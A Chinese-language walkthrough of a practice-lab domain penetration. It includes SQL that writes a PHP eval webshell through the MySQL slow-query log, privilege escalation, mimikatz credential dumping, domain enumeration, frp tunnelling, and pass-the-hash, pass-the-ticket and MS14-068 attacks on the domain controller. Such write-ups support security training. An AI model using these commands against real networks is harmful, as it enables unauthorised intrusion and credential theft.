內網滲透之小試牛刀

內網滲透之小試牛刀

---

• 離你最近的地方，路途最遠。

---

思路:

獲取服務器權限->進入內網->判斷是否在域中->信息收集(定位域控、域主機、域用戶賬號密碼等)->橫向移動(漏洞利用)->拿下域控。

獲取權限:

靶場爲http://vulnstack.qiyuanxuetang.net/vuln
直接開搞，首先判斷yxcms，然後根據版本嘗試一些漏洞無果，進而收集端口以及目錄，發現phpmyadmin，弱口令進入
通過慢查詢日誌getshell

show variables like '%slow%'; 
set GLOBAL slow_query_log=on;
set global slow_query_log_file = 'c:/phpstudy/www/1.php';
select '<?php eval($_POST[cmd]);?>' from mysql.db where sleep(10);

即可獲取shell：

準備工作：

由於菜刀不好用，直接反彈cs，
然後將cs傳給msf，首先msf利用exploit/multi/handler監聽，然後cs中把msf監聽地址以及端口添加到listen並使用forgein進行監聽，然後cs中spawn即可。

內網蒐集：

一切就緒，就可以開始信息收集了，首先判斷是否在域中，通過ipconfig /all，即可簡單判斷在域中。
但是現在使用的是本機普通用戶，所以準備提權，進而收集相關域信息，如果提權不了，只能橫向滲透，尋找域用戶以及提權(當你是域用戶以及system權限都可執行域命令)。

利用cs直接提權，也可上傳如CVE-2019-0803、或利用Powershell提權等，

msf提權，多種方法比如自帶的bypassuac(exploit/windows/local/bypassuac…)以及一些系統溢出漏洞提權,利用use post/multi/recon/local_exploit_suggester等等，即可提權。

首先裏mimikatz收集賬號密碼信息，看是否存在域管理員密碼，域成員密碼等

然後開始收集相關域信息

ipconfig          		查看ip
net view /domain       查看有幾個域
net time /domain        查看時間/一般也就是域控
net user /domain        查看域用戶
net group "domain computers" /domain         查看域內所有的主機名
net group "domain admins"   /domain          查看域管理員
net group "domain controllers" /domain       查看域控

初步判斷

域爲god.org
域中三臺服務器
域控owa.god.org(192.168.52.138)
本機STU1內網ip爲(192.168.52.143)
ROOT-TVI862UBEH主機ip(192.168.52.141)
域用戶爲：Administrator   Guest     krbtgt  ligang   liukaifeng01

橫向滲透：

首先添加路由,即可訪問到本機可以訪問到的主機

route add 0.0.0.0 0.0.0.0 1
route print

然後利用掃描一波內網，利用auxiliary/scanner/portscan/tcp

cs掃描該網段
首先利用frp建立隧道轉發，把frpc.exe、frpc.ini上傳目標機，運行frpc.exe -c frpc.ini，攻擊機執行frps -c frps.ini，即可搭建成功。

然後掃描針對於不同端口，進行不同攻擊。

比如445查看是否存在17-010漏洞，7001weblogic反序列化，以及開啓的web服務等等，獲取相對於服務器權限。

拿下域控：

1. 令牌假冒攻擊：

meterpreter下

use incognito
list_tokens -u
impersonate_token  \\用戶

或者steal_token域管pid即可獲取域控。

然後可以利用dir查詢所有服務器目錄

dir \\192.168.52.138\c$   查看c盤
dir \\192.168.52.138\c$\*.txt /s /b 在c盤下搜.txt文件

2. PTH：
找到域管NTLM哈希，
cs利用

msf利用mimikatz或exploit/windows/smb/psexec_psh

sekurlsa::pth /user:administrator /domain:"god.org" /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0
3. ptt之非約束委派TGT攻擊：

privilege::debug
sekurlsa::tickets /export 導出所有內存票據
Kerberos::purge  清除內存票據
kerberos::ptt [0;ac01a][email protected]  將TGT內容導入到當前會話中
kerberos::list  查看

即可獲取域控。

4. ppt之ms14-068
獲取一個域成員及密碼以及域控沒有打3011780補丁即可。
首先獲取域成員sid

然後在域機器中生成TGT票據，利用ms14-068exp生成.ccache文件，
MS14-068.exe -u 域成員名@域名 -s 域成員sid -d 域控制器地址 -p 域成員密碼
!
然後進行票據注入

kerberos::purge      //清空當前機器中所有憑證，如果有域成員憑證會影響憑證僞造
kerberos::list          //查看是否當前機器憑證
kerberos::ptc         //將票據注入到內存中

即可獲取域控，

**餘生很長，請多指教。**